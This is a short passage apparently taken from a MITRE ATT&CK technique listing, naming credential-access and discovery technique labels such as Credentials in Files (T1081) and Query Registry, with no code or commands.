Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery